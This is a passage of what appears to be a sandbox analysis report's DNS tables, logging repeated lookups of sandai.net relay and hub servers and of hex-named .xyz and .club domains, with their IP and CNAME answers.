                                                                                                                                                  Dec 5, 2020 08:44:18.669492006 CET192.168.2.38.8.8.80xfbd3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.217264891 CET192.168.2.38.8.8.80x44adStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.749089956 CET192.168.2.38.8.8.80x6843Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.296304941 CET192.168.2.38.8.8.80xca7dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.842305899 CET192.168.2.38.8.8.80x492Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.357323885 CET192.168.2.38.8.8.80x769fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.890527010 CET192.168.2.38.8.8.80x9e60Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.444001913 CET192.168.2.38.8.8.80x8d8fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.983156919 CET192.168.2.38.8.8.80x9f9bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.502736092 CET192.168.2.38.8.8.80xf2e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.046238899 CET192.168.2.38.8.8.80x434fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.591864109 CET192.168.2.38.8.8.80xf3f3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.124499083 CET192.168.2.38.8.8.80xf392Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.670666933 CET192.168.2.38.8.8.80xca6eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.218074083 CET192.168.2.38.8.8.80xb27dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.749294996 CET192.168.2.38.8.8.80xee8fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.264238119 CET192.168.2.38.8.8.80xb72cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.796911001 CET192.168.2.38.8.8.80x7fabStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.345057964 CET192.168.2.38.8.8.80x2273Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.874937057 CET192.168.2.38.8.8.80xd524Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.404752970 CET192.168.2.38.8.8.80xab11Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.942001104 CET192.168.2.38.8.8.80x7ec4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:30.538630962 CET192.168.2.38.8.8.80x58e1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.092473030 CET192.168.2.38.8.8.80xa3a5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.612140894 CET192.168.2.38.8.8.80x53cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.162920952 CET192.168.2.38.8.8.80xb3a6Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.686481953 CET192.168.2.38.8.8.80x1bd9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.233244896 CET192.168.2.38.8.8.80x3fdeStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.780996084 CET192.168.2.38.8.8.80xbae7Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.295671940 CET192.168.2.38.8.8.80x2cffStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.842538118 CET192.168.2.38.8.8.80x8f55Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.360580921 CET192.168.2.38.8.8.80xde4eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.905311108 CET192.168.2.38.8.8.80xefb1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:36.460200071 CET192.168.2.38.8.8.80x76e6Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.004929066 CET192.168.2.38.8.8.80xbfffStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.547617912 CET192.168.2.38.8.8.80x5b38Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.062274933 CET192.168.2.38.8.8.80x19afStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.577480078 CET192.168.2.38.8.8.80xb75dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.108922005 CET192.168.2.38.8.8.80x7d09Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.640337944 CET192.168.2.38.8.8.80xb04eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.195466042 CET192.168.2.38.8.8.80x14baStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.734242916 CET192.168.2.38.8.8.80x2ad0Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.249723911 CET192.168.2.38.8.8.80x9080Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.781835079 CET192.168.2.38.8.8.80xf744Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.316418886 CET192.168.2.38.8.8.80xd5c9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.843507051 CET192.168.2.38.8.8.80x8c9cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.386141062 CET192.168.2.38.8.8.80x55c1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.907150030 CET192.168.2.38.8.8.80x7badStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.437218904 CET192.168.2.38.8.8.80x405fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.984076977 CET192.168.2.38.8.8.80x415dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.500381947 CET192.168.2.38.8.8.80x521cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.069277048 CET192.168.2.38.8.8.80x912aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.597650051 CET192.168.2.38.8.8.80xf57cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.150854111 CET192.168.2.38.8.8.80x2942Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.720201015 CET192.168.2.38.8.8.80xf3d4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.252520084 CET192.168.2.38.8.8.80xe143Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.798460960 CET192.168.2.38.8.8.80x59d5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.317466021 CET192.168.2.38.8.8.80x6525Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.859556913 CET192.168.2.38.8.8.80x2253Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.391560078 CET192.168.2.38.8.8.80xfacfStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.906727076 CET192.168.2.38.8.8.80x66cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.454305887 CET192.168.2.38.8.8.80xe583Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.970223904 CET192.168.2.38.8.8.80xfc99Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:52.522691011 CET192.168.2.38.8.8.80x20e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.047398090 CET192.168.2.38.8.8.80xbb96Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.563600063 CET192.168.2.38.8.8.80xdc95Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.095347881 CET192.168.2.38.8.8.80xc8d3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.626287937 CET192.168.2.38.8.8.80xd67eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.156809092 CET192.168.2.38.8.8.80xfcc1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.688621998 CET192.168.2.38.8.8.80xd800Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.235286951 CET192.168.2.38.8.8.80x89abStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.756474972 CET192.168.2.38.8.8.80x8ec8Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.310049057 CET192.168.2.38.8.8.80x4c3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.830212116 CET192.168.2.38.8.8.80xa191Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.378381014 CET192.168.2.38.8.8.80xea8bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.923456907 CET192.168.2.38.8.8.80xff92Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.453959942 CET192.168.2.38.8.8.80x7b7cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.989223003 CET192.168.2.38.8.8.80xefe7Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.532516956 CET192.168.2.38.8.8.80xcd07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.066127062 CET192.168.2.38.8.8.80x8b57Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.598042011 CET192.168.2.38.8.8.80x2300Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.144747019 CET192.168.2.38.8.8.80x2707Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.690109968 CET192.168.2.38.8.8.80x2276Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.221651077 CET192.168.2.38.8.8.80x1abaStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.736870050 CET192.168.2.38.8.8.80x146bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.267421007 CET192.168.2.38.8.8.80xf9deStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.783400059 CET192.168.2.38.8.8.80xe7e9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.330240965 CET192.168.2.38.8.8.80xee33Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.877887964 CET192.168.2.38.8.8.80xffeaStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.407953024 CET192.168.2.38.8.8.80x4136Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.940469980 CET192.168.2.38.8.8.80xbad5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
Dec 5, 2020 08:45:07.470385075 CET | 192.168.2.3 | 8.8.8.8 | 0xfbb4 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:07.985903025 CET | 192.168.2.3 | 8.8.8.8 | 0xac9d | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:08.503778934 CET | 192.168.2.3 | 8.8.8.8 | 0x214a | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:09.033617020 CET | 192.168.2.3 | 8.8.8.8 | 0x3d2e | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:09.566113949 CET | 192.168.2.3 | 8.8.8.8 | 0xf783 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:10.112205029 CET | 192.168.2.3 | 8.8.8.8 | 0xf14c | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:10.626859903 CET | 192.168.2.3 | 8.8.8.8 | 0xb07 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:11.142332077 CET | 192.168.2.3 | 8.8.8.8 | 0x6263 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:11.676170111 CET | 192.168.2.3 | 8.8.8.8 | 0xfa98 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:12.206394911 CET | 192.168.2.3 | 8.8.8.8 | 0xeaa4 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:12.737648010 CET | 192.168.2.3 | 8.8.8.8 | 0x9141 | Standard query (0) | relay.phub.hz.sandai.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 5, 2020 08:41:53.382879019 CET | 8.8.8.8 | 192.168.2.3 | 0x92a9 | No error (0) | ef6df4af06ba6896.xyz | | 104.28.4.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:41:53.382879019 CET | 8.8.8.8 | 192.168.2.3 | 0x92a9 | No error (0) | ef6df4af06ba6896.xyz | | 104.28.5.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:41:53.382879019 CET | 8.8.8.8 | 192.168.2.3 | 0x92a9 | No error (0) | ef6df4af06ba6896.xyz | | 172.67.194.30 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:42:48.097821951 CET | 8.8.8.8 | 192.168.2.3 | 0xbe88 | No error (0) | ef6df4af06ba6896.xyz | | 104.28.4.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:42:48.097821951 CET | 8.8.8.8 | 192.168.2.3 | 0xbe88 | No error (0) | ef6df4af06ba6896.xyz | | 104.28.5.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:42:48.097821951 CET | 8.8.8.8 | 192.168.2.3 | 0xbe88 | No error (0) | ef6df4af06ba6896.xyz | | 172.67.194.30 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:12.422032118 CET | 8.8.8.8 | 192.168.2.3 | 0x2421 | No error (0) | 1c5491a87d65f1ef.club | | 172.67.142.39 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:12.422032118 CET | 8.8.8.8 | 192.168.2.3 | 0x2421 | No error (0) | 1c5491a87d65f1ef.club | | 104.27.183.69 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:12.422032118 CET | 8.8.8.8 | 192.168.2.3 | 0x2421 | No error (0) | 1c5491a87d65f1ef.club | | 104.27.182.69 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:28.410265923 CET | 8.8.8.8 | 192.168.2.3 | 0xf72f | No error (0) | ef6df4af06ba6896.xyz | | 104.28.4.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:28.410265923 CET | 8.8.8.8 | 192.168.2.3 | 0xf72f | No error (0) | ef6df4af06ba6896.xyz | | 104.28.5.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:28.410265923 CET | 8.8.8.8 | 192.168.2.3 | 0xf72f | No error (0) | ef6df4af06ba6896.xyz | | 172.67.194.30 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:33.050405025 CET | 8.8.8.8 | 192.168.2.3 | 0x34d3 | No error (0) | ef6df4af06ba6896.xyz | | 104.28.4.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:33.050405025 CET | 8.8.8.8 | 192.168.2.3 | 0x34d3 | No error (0) | ef6df4af06ba6896.xyz | | 104.28.5.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:33.050405025 CET | 8.8.8.8 | 192.168.2.3 | 0x34d3 | No error (0) | ef6df4af06ba6896.xyz | | 172.67.194.30 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:43.599741936 CET | 8.8.8.8 | 192.168.2.3 | 0xdb46 | No error (0) | EF6DF4AF06BA6896.xyz | | 104.28.4.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:43.599741936 CET | 8.8.8.8 | 192.168.2.3 | 0xdb46 | No error (0) | EF6DF4AF06BA6896.xyz | | 104.28.5.129 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:43.599741936 CET | 8.8.8.8 | 192.168.2.3 | 0xdb46 | No error (0) | EF6DF4AF06BA6896.xyz | | 172.67.194.30 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | hub5pn.hz.sandai.net | hub5pn.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | hub5pn.sandai.net | cnc.hub5pn.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 153.3.232.174 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 157.255.225.49 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 211.91.242.37 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 157.255.225.53 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 111.206.4.164 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 153.3.232.175 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 58.144.251.1 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 118.212.146.20 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 118.212.146.21 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 111.206.4.176 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 58.144.251.2 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.439646006 CET | 8.8.8.8 | 192.168.2.3 | 0x6bfc | No error (0) | cnc.hub5pn.sandai.net | | 211.91.242.38 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.481640100 CET | 8.8.8.8 | 192.168.2.3 | 0x79fc | No error (0) | hub5pnc.hz.sandai.net | hub5pnc.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.481640100 CET | 8.8.8.8 | 192.168.2.3 | 0x79fc | No error (0) | hub5pnc.sandai.net | cnc.hub5pnc.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.481640100 CET | 8.8.8.8 | 192.168.2.3 | 0x79fc | No error (0) | cnc.hub5pnc.sandai.net | | 47.92.99.221 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.481640100 CET | 8.8.8.8 | 192.168.2.3 | 0x79fc | No error (0) | cnc.hub5pnc.sandai.net | | 47.92.100.53 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.542771101 CET | 8.8.8.8 | 192.168.2.3 | 0x7c4 | No error (0) | hubstat.hz.sandai.net | hubstat.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.542771101 CET | 8.8.8.8 | 192.168.2.3 | 0x7c4 | No error (0) | hubstat.sandai.net | cnchubstat.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.542771101 CET | 8.8.8.8 | 192.168.2.3 | 0x7c4 | No error (0) | cnchubstat.sandai.net | | 140.206.225.136 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.542771101 CET | 8.8.8.8 | 192.168.2.3 | 0x7c4 | No error (0) | cnchubstat.sandai.net | | 140.206.225.232 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | hub5idx.shub.hz.sandai.net | hub5t.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | hub5t.sandai.net | hub4t.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | hub4t.sandai.net | cnchub5sr.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cnchub5sr.sandai.net | cncidx.m.hub.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.64 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.72 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.6 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.44 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.40 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.815103054 CET | 8.8.8.8 | 192.168.2.3 | 0x7c3 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.154 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | hub5c.hz.sandai.net | hub5c.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | hub5c.sandai.net | hub4t.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | hub4t.sandai.net | cnchub5sr.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cnchub5sr.sandai.net | cncidx.m.hub.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.44 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.64 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.154 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.40 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.6 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.870011091 CET | 8.8.8.8 | 192.168.2.3 | 0x7c0 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.72 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.884772062 CET | 8.8.8.8 | 192.168.2.3 | 0x600a | No error (0) | hub5u.hz.sandai.net | hub5u.sandai.net | | CNAME (Canonical name) | IN (0x0001)
